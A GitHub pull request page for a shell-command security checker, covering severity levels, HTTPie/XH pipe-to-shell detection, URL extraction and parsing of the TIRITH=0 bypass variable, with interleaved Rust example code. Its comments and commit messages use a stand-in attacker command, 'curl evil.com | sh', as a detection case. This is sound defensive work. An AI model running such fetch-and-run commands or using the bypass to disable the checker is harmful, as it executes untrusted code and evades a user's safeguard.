Add Info severity level and HTTPie/XH pipe-to-shell detection#43

Merged
sheeki03 merged 14 commits into main from feat/part1-info-severity-httpie on Feb 24, 2026
Conversation

@sheeki03 (Owner)

@sheeki03 sheeki03 commented Feb 24, 2026

Summary

  • Add Info severity level for low-noise informational findings
  • Add HTTPie (http/https) and XH as monitored pipe-to-shell downloaders
  • Fix audit silent failures, output error handling
  • Bug fixes for schemeless URL detection, tokenizer, doctor, shell hooks

Test plan

  • All existing tests pass

🤖 Generated with Claude Code

Note

Emit INFO output for allowed verdicts and default max severity to Severity::Info in cli::score::run

Set the action label to INFO when verdict.action is Allow in human and no-color output, and default max severity to Severity::Info in cli::score::run for empty findings.

📍Where to Start

Start with output::write_human in output.rs, then review cli::score::run in score.rs.

Macroscope summarized fbfa5d9.

sheeki03 and others added 8 commits February 18, 2026 11:49
…isplay

- Report audit log errors instead of silently swallowing them
- Handle CLI output write errors in check/run/score
- Display Info-severity findings in human output (was silently dropped)
- Use Info as default severity fallback instead of Low
push_segment() incorrectly treated VAR=VALUE as the command token. Now
skips leading environment variable assignments to find the real command.
Adds pub is_env_assignment() helper for use by engine bypass detection.

Fixes: TIRITH=0 curl evil.com now correctly identifies curl as command.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
Add command-aware output-flag skipping for curl (-o/--output) and wget
(-O/-OFILE/--output-document). Extract URLs from command+args instead
of raw segment text to avoid matching URLs in env-prefix values.

Add conservative non-TLD file extensions (.png, .jpg, .mp4, etc.) to
schemeless host exclusion list. Fixes issue #33.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
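As an added example (not tirith's own code, and not part of the commit message above), the URL extraction described in that commit: URLs are pulled from the already-identified command and its arguments rather than from the raw segment, so values in a leading VAR=VALUE prefix are never scanned; the argument that is an output path for curl -o/--output or wget -O/--output-document is skipped; and a schemeless token such as evil.com counts as a host while logo.png does not. The function names, the Segment-free signature and the extension list are assumptions for illustration.

```rust
// Added example, not tirith's own code. Function names and the extension
// list below are assumptions for illustration.

/// Conservative list of file extensions that are not TLDs (assumed list).
const NON_TLD_EXTENSIONS: &[&str] = &[
    "png", "jpg", "jpeg", "gif", "svg", "mp4", "mp3", "zip", "tar", "gz", "txt",
];

/// Does `flag` make the *next* argument an output path for this command?
fn takes_output_path(command: &str, flag: &str) -> bool {
    match command {
        "curl" => matches!(flag, "-o" | "--output"),
        "wget" => matches!(flag, "-O" | "--output-document"),
        _ => false,
    }
}

/// Attached forms: `-oFILE` for curl, `-OFILE` or `--output-document=FILE` for wget.
fn is_attached_output_path(command: &str, arg: &str) -> bool {
    match command {
        "curl" => arg.len() > 2 && arg.starts_with("-o"),
        "wget" => (arg.len() > 2 && arg.starts_with("-O")) || arg.starts_with("--output-document="),
        _ => false,
    }
}

/// A schemeless URL candidate: dotted labels whose last label is alphabetic
/// and not a known file extension. `evil.com/x.sh` passes; `logo.png` and
/// `1.2` do not.
pub fn looks_like_schemeless_host(token: &str) -> bool {
    let host = token.split('/').next().unwrap_or("");
    let Some((_, last)) = host.rsplit_once('.') else { return false };
    if last.is_empty() || !last.chars().all(|c| c.is_ascii_alphabetic()) {
        return false;
    }
    if NON_TLD_EXTENSIONS.contains(&last.to_ascii_lowercase().as_str()) {
        return false;
    }
    host.split('.').all(|label| {
        !label.is_empty() && label.chars().all(|c| c.is_ascii_alphanumeric() || c == '-')
    })
}

/// Walk the arguments of an already-identified command and return every
/// token that is an absolute or schemeless URL, skipping output paths.
/// Because only `args` is scanned, a prefix like `URL=evil.com curl ...`
/// never contributes its value.
pub fn extract_urls(command: &str, args: &[&str]) -> Vec<String> {
    let mut urls = Vec::new();
    let mut next_is_output = false;
    for &arg in args {
        if next_is_output {
            // This token is the file named by the preceding -o/-O flag.
            next_is_output = false;
            continue;
        }
        if takes_output_path(command, arg) {
            next_is_output = true;
            continue;
        }
        if is_attached_output_path(command, arg) || arg.starts_with('-') {
            continue;
        }
        if arg.starts_with("http://") || arg.starts_with("https://") || looks_like_schemeless_host(arg)
        {
            urls.push(arg.to_string());
        }
    }
    urls
}

fn main() {
    // Constructed sample: the output file is named like a host on purpose.
    println!("{:?}", extract_urls("wget", &["-O", "evil.com", "example.com/a.sh"]));
}
```

Note that `.sh` is deliberately not in the extension list (the commit calls the list conservative), so `curl -o install.sh https://...` only avoids reporting `install.sh` because it follows `-o`; without the flag-aware skip the output filename would be reported as a second, schemeless URL.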
…paths

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
sheeki03 and others added 3 commits February 24, 2026 22:39
- Run cargo fmt --all
- Fix clippy lints: collapsible else-if in check.rs, uninlined_format_args
- Add .cargo/audit.toml ignoring RUSTSEC-2026-0009 (time crate DoS,
  not exploitable in our usage, fix requires Rust 1.88)
- Add same ignore to deny.toml
- Merge origin/main (glibc build fix)
- Fix single & segment boundary in split_raw_words (security)
- Use exact match == TIRITH=0 (prevents false bypass)
- Skip flags in resolve_command_wrapper
- Remove dead code in is_tirith_command

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
- TIRITH='0' and TIRITH="0" are now recognized as bypass assignments
  (split_raw_words preserves quotes, so literal == "TIRITH=0" missed these)
- Require a real command word after TIRITH=0 in the same segment — bare
  TIRITH=0 or TIRITH=0; with no command is no longer treated as bypass
- Same fixes applied to the env wrapper path
- Add is_tirith_bypass_assignment() + strip_surrounding_quotes() helpers
- Add 14 unit tests covering quoted values, no-command rejection, env paths

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
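As an added example (not tirith's own code, and not part of the commit messages above), the tokenizer behaviour the push_segment and TIRITH=0 commits describe: a command line is split into segments at unquoted `;`, `|` and a single `&`; leading VAR=VALUE words are skipped to find the real command; and a TIRITH=0 assignment, quoted or not, counts as a bypass only when a real command word follows it in the same segment. The function names, the Segment struct and the quote handling are assumptions for illustration.

```rust
// Added example, not tirith's own code. Names and the quote handling are
// assumptions for illustration.

/// Split a command line into segments at unquoted `;`, `|`, `||`, `&` and
/// `&&`. A single `&` is a boundary too: in `TIRITH=0 & curl evil.com | sh`
/// the backgrounded assignment must not bless the second segment.
pub fn split_segments(line: &str) -> Vec<String> {
    let mut segs = Vec::new();
    let mut cur = String::new();
    let mut quote: Option<char> = None;
    for c in line.chars() {
        match quote {
            Some(q) => {
                cur.push(c);
                if c == q { quote = None; }
            }
            None if c == '"' || c == '\'' => { quote = Some(c); cur.push(c); }
            None if matches!(c, ';' | '|' | '&') => {
                if !cur.trim().is_empty() { segs.push(cur.trim().to_string()); }
                cur.clear();
            }
            None => cur.push(c),
        }
    }
    if !cur.trim().is_empty() { segs.push(cur.trim().to_string()); }
    segs
}

/// Split one segment into words, keeping quoted words whole (quotes preserved).
pub fn split_raw_words(segment: &str) -> Vec<String> {
    let mut words = Vec::new();
    let mut cur = String::new();
    let mut quote: Option<char> = None;
    for c in segment.chars() {
        match (quote, c) {
            (Some(q), _) if c == q => { quote = None; cur.push(c); }
            (Some(_), _) => cur.push(c),
            (None, '"') | (None, '\'') => { quote = Some(c); cur.push(c); }
            (None, c) if c.is_whitespace() => {
                if !cur.is_empty() { words.push(std::mem::take(&mut cur)); }
            }
            (None, c) => cur.push(c),
        }
    }
    if !cur.is_empty() { words.push(cur); }
    words
}

/// True if `word` is a POSIX-style assignment: an identifier followed by `=`.
/// `curl http://x/?a=b` is not one, because `http://x/?a` is not an identifier.
pub fn is_env_assignment(word: &str) -> bool {
    let Some((name, _)) = word.split_once('=') else { return false };
    let mut chars = name.chars();
    match chars.next() {
        Some(c) if c == '_' || c.is_ascii_alphabetic() => {}
        _ => return false,
    }
    chars.all(|c| c == '_' || c.is_ascii_alphanumeric())
}

/// Strip one layer of matching single or double quotes.
pub fn strip_surrounding_quotes(s: &str) -> &str {
    let b = s.as_bytes();
    if b.len() >= 2 && (b[0] == b'"' || b[0] == b'\'') && b[b.len() - 1] == b[0] {
        &s[1..s.len() - 1]
    } else {
        s
    }
}

/// TIRITH=0, TIRITH='0' and TIRITH="0" match; TIRITH=00 and TIRITH=0x do not.
pub fn is_tirith_bypass_assignment(word: &str) -> bool {
    match word.split_once('=') {
        Some(("TIRITH", value)) => strip_surrounding_quotes(value) == "0",
        _ => false,
    }
}

#[derive(Debug, PartialEq)]
pub struct Segment {
    pub env: Vec<String>,
    pub command: Option<String>,
    pub args: Vec<String>,
    pub bypass: bool,
}

/// Skip leading assignments so `TIRITH=0 curl evil.com` yields command `curl`.
/// A bypass requires a command in the same segment: a bare `TIRITH=0`
/// just sets a variable and must not disable checks.
pub fn parse_segment(segment: &str) -> Segment {
    let mut rest = split_raw_words(segment).into_iter().peekable();
    let mut env = Vec::new();
    while rest.peek().map_or(false, |w| is_env_assignment(w)) {
        env.push(rest.next().unwrap());
    }
    let command = rest.next();
    let args: Vec<String> = rest.collect();
    let bypass = command.is_some() && env.iter().any(|e| is_tirith_bypass_assignment(e));
    Segment { env, command, args, bypass }
}
```

Run the pieces in order: split_segments first, then parse_segment on each piece, so an assignment in one segment can never qualify as a bypass for the command in the next one.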
sheeki03 and others added 2 commits February 25, 2026 00:31
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
Resolve deny.toml conflict by taking main's version.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
sheeki03 merged commit b587439 into main on Feb 24, 2026
9 checks passed
sheeki03 deleted the feat/part1-info-severity-httpie branch on February 24, 2026 21:58